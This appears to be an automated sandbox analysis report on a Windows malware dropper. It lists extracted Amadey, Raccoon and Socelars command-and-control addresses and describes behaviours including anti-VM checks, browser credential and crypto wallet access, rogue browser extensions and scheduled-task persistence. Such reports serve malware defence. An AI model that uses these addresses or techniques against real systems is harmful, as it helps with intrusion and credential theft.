Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
22-01-2023 21:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
4.5MB
-
MD5
45808a630c51b487ada4b470be9b5964
-
SHA1
527185ffef9e41a671ee637a82df9e5a43a296ca
-
SHA256
ba36d04cdfbdd729450db17a6f0b8b953ca8b91aefb9d56a71e58864c8e0fb61
-
SHA512
34b655f964e43f6267362b4e9b5915351b2c23d5ce81a21e3db1140fdf451248bead299d8e3bbd2d99d1972275f28a88d666f4a94a9e2d8ceb2ac7ae12d90559
-
SSDEEP
98304:1IiEg/+jaTrBfR2CNgPAtBlycENpYp7O9xs:1o22CNgzcEPU7Ov
Malware Config
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
raccoon
04f8fa0bf52b1b98a127f6deeac54f84
http://94.131.3.70/
http://83.217.11.11/
http://83.217.11.13/
http://83.217.11.14/
http://45.15.156.222/
Extracted
socelars
https://hdbywe.s3.us-west-2.amazonaws.com/sdfeas18/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4712 2652 rundll32.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 732 2652 rundll32.exe 96 -
Socelars payload 2 IoCs
resource yara_rule behavioral2/files/0x0001000000022e08-171.dat family_socelars behavioral2/files/0x0001000000022e08-170.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ birge.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ W8xBG2CB.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ WlndowsDraiver-Ver2.5.5.8.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 164 4424 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
pid Process 536 Player3.exe 620 birge.exe 1500 nbveek.exe 2892 zhangfan.exe 3592 zhangfan.exe 396 pb1111.exe 4848 handdiy_1.exe 976 random.exe 3192 random.exe 1224 setup.exe 5040 Install.exe 3412 Install.exe 1088 W8xBG2CB.exe 4620 nEzF0Hw6.exe 3988 nbveek.exe 4852 WlndowsDraiver-Ver2.5.5.8.exe 4748 NbuyrFd.exe 376 nbveek.exe 1088 ChromeRecovery.exe 3868 OMKHFdR.exe -
resource yara_rule behavioral2/files/0x0001000000022e05-161.dat vmprotect behavioral2/files/0x0001000000022e05-160.dat vmprotect behavioral2/memory/396-163-0x0000000140000000-0x000000014061E000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion birge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion birge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion W8xBG2CB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion W8xBG2CB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WlndowsDraiver-Ver2.5.5.8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WlndowsDraiver-Ver2.5.5.8.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation W8xBG2CB.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation birge.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation OMKHFdR.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Player3.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation zhangfan.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 8 IoCs
pid Process 4824 rundll32.exe 1228 rundll32.exe 620 birge.exe 620 birge.exe 620 birge.exe 4572 rundll32.exe 4424 rundll32.exe 4424 rundll32.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 2012 icacls.exe 620 icacls.exe 828 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0003000000022e6c-231.dat themida behavioral2/files/0x0003000000022e6c-230.dat themida behavioral2/memory/1088-232-0x0000000140000000-0x0000000141064000-memory.dmp themida behavioral2/memory/1088-238-0x0000000140000000-0x0000000141064000-memory.dmp themida behavioral2/files/0x0004000000022e3b-249.dat themida behavioral2/memory/1088-250-0x0000000140000000-0x0000000141064000-memory.dmp themida behavioral2/memory/4852-253-0x0000000140000000-0x0000000141064000-memory.dmp themida behavioral2/memory/4852-254-0x0000000140000000-0x0000000141064000-memory.dmp themida behavioral2/memory/4852-289-0x0000000140000000-0x0000000141064000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WlndowsDraiver-Ver2.5.5.8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA birge.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA W8xBG2CB.exe -
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json OMKHFdR.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini OMKHFdR.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 OMKHFdR.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_2DC033A4A2D3E56E04293794AD2B5A7F OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2DC033A4A2D3E56E04293794AD2B5A7F OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 OMKHFdR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_AC22B722B474AE2AEDB339EDE8A91804 OMKHFdR.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_AC22B722B474AE2AEDB339EDE8A91804 OMKHFdR.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini NbuyrFd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA OMKHFdR.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol NbuyrFd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C OMKHFdR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA OMKHFdR.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 620 birge.exe -
Drops file in Program Files directory 31 IoCs
description ioc Process File created C:\Program Files (x86)\zFCBYkQYpDUn\NjmKmYG.dll OMKHFdR.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\manifest.json elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\_metadata\verified_contents.json elevation_service.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi OMKHFdR.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\manifest.json elevation_service.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js handdiy_1.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\manifest.json handdiy_1.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe elevation_service.exe File created C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\vZGhkIX.xml OMKHFdR.exe File created C:\Program Files (x86)\nWqLCKNYOCKLC\OpkcIds.dll OMKHFdR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak OMKHFdR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja OMKHFdR.exe File created C:\Program Files (x86)\sDZzDwaoU\KvAeUNL.xml OMKHFdR.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\jquery-3.3.1.min.js handdiy_1.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecoveryCRX.crx elevation_service.exe File created C:\Program Files (x86)\sDZzDwaoU\jGcLAk.dll OMKHFdR.exe File opened for modification C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js handdiy_1.exe File created C:\Program Files (x86)\nWqLCKNYOCKLC\tCCGmgb.xml OMKHFdR.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\content.js handdiy_1.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\pad-nopadding.js handdiy_1.exe File created C:\Program Files (x86)\EqfDIhLUOuAU2\kNeSGxe.xml OMKHFdR.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\background.html handdiy_1.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\icon.png handdiy_1.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\aes.js handdiy_1.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\_metadata\verified_contents.json elevation_service.exe File created C:\Program Files (x86)\EqfDIhLUOuAU2\ojoGlcSLaAKkD.dll OMKHFdR.exe File created C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\xnAEgLU.dll OMKHFdR.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\mode-ecb.js handdiy_1.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi OMKHFdR.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak OMKHFdR.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\ckXwTgLLPEtUwbToA.job schtasks.exe File created C:\Windows\Tasks\FeYIZJMIrDMHpta.job schtasks.exe File created C:\Windows\Tasks\zCCIxqGdnvUEnSAiG.job schtasks.exe File created C:\Windows\Tasks\bnNSajhVxJSdGghoLZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 824 4824 WerFault.exe 99 1728 1228 WerFault.exe 111 3732 4424 WerFault.exe 189 -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1432 schtasks.exe 1312 schtasks.exe 4452 schtasks.exe 4544 schtasks.exe 772 schtasks.exe 2452 schtasks.exe 4724 schtasks.exe 1040 schtasks.exe 3588 schtasks.exe 5012 schtasks.exe 2760 schtasks.exe 4132 schtasks.exe 4740 schtasks.exe 3728 schtasks.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 1 IoCs
pid Process 764 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OMKHFdR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OMKHFdR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket OMKHFdR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\NukeOnDelete = "0" OMKHFdR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" OMKHFdR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000} OMKHFdR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume OMKHFdR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" OMKHFdR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OMKHFdR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" OMKHFdR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 44 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 620 birge.exe 620 birge.exe 620 birge.exe 620 birge.exe 620 birge.exe 620 birge.exe 4404 chrome.exe 4404 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5012 powershell.EXE 5012 powershell.EXE 5012 powershell.EXE 3600 chrome.exe 3600 chrome.exe 620 chrome.exe 620 chrome.exe 4076 chrome.exe 4076 chrome.exe 3744 chrome.exe 3744 chrome.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 3128 powershell.exe 3128 powershell.exe 3128 powershell.exe 4620 powershell.EXE 4620 powershell.EXE 4620 powershell.EXE 4764 chrome.exe 4764 chrome.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe 3868 OMKHFdR.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 4848 handdiy_1.exe Token: SeAssignPrimaryTokenPrivilege 4848 handdiy_1.exe Token: SeLockMemoryPrivilege 4848 handdiy_1.exe Token: SeIncreaseQuotaPrivilege 4848 handdiy_1.exe Token: SeMachineAccountPrivilege 4848 handdiy_1.exe Token: SeTcbPrivilege 4848 handdiy_1.exe Token: SeSecurityPrivilege 4848 handdiy_1.exe Token: SeTakeOwnershipPrivilege 4848 handdiy_1.exe Token: SeLoadDriverPrivilege 4848 handdiy_1.exe Token: SeSystemProfilePrivilege 4848 handdiy_1.exe Token: SeSystemtimePrivilege 4848 handdiy_1.exe Token: SeProfSingleProcessPrivilege 4848 handdiy_1.exe Token: SeIncBasePriorityPrivilege 4848 handdiy_1.exe Token: SeCreatePagefilePrivilege 4848 handdiy_1.exe Token: SeCreatePermanentPrivilege 4848 handdiy_1.exe Token: SeBackupPrivilege 4848 handdiy_1.exe Token: SeRestorePrivilege 4848 handdiy_1.exe Token: SeShutdownPrivilege 4848 handdiy_1.exe Token: SeDebugPrivilege 4848 handdiy_1.exe Token: SeAuditPrivilege 4848 handdiy_1.exe Token: SeSystemEnvironmentPrivilege 4848 handdiy_1.exe Token: SeChangeNotifyPrivilege 4848 handdiy_1.exe Token: SeRemoteShutdownPrivilege 4848 handdiy_1.exe Token: SeUndockPrivilege 4848 handdiy_1.exe Token: SeSyncAgentPrivilege 4848 handdiy_1.exe Token: SeEnableDelegationPrivilege 4848 handdiy_1.exe Token: SeManageVolumePrivilege 4848 handdiy_1.exe Token: SeImpersonatePrivilege 4848 handdiy_1.exe Token: SeCreateGlobalPrivilege 4848 handdiy_1.exe Token: 31 4848 handdiy_1.exe Token: 32 4848 handdiy_1.exe Token: 33 4848 handdiy_1.exe Token: 34 4848 handdiy_1.exe Token: 35 4848 handdiy_1.exe Token: SeDebugPrivilege 764 taskkill.exe Token: SeDebugPrivilege 5012 powershell.EXE Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 3128 powershell.exe Token: SeDebugPrivilege 4620 powershell.EXE -
Suspicious use of FindShellTrayWindow 52 IoCs
